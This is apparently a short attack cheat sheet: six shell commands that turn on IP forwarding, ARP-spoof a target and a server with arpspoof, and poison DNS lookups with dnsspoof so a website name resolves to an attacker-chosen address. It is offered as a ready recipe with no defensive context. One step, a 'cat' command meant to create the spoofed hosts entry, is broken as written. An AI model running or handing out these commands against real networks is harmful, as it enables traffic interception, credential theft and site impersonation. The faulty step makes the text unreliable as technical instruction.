[TURN ON IP FORWARDING]
$ echo 1 > /proc/sys/net/ipv4/ip_forward
[INITIATE ARP POSITIONING – TARGET AND DESTINATION]
$ arpspoof -i eth0 -t <target_IP_address> <who_we_want_to_be>
$ arpspoof -i eth0 -t <server_IP_address> <target_IP_address>
[LOOK AT THE CURRENT DNS ENTRIES]
$ nslookup www.webpage.com
[CREATE YOUR ALTERNATE DNS PATH]
$ cat 192.168.1.xx www.webpage.com >> anyfile.txt
[INITIATE DNS CACHE POISONING]
$ dnsspoof -i eth0 -f anyfile.txt
VIEW AN EXPANDED EXPLANATION OF DNS CACHE POISONING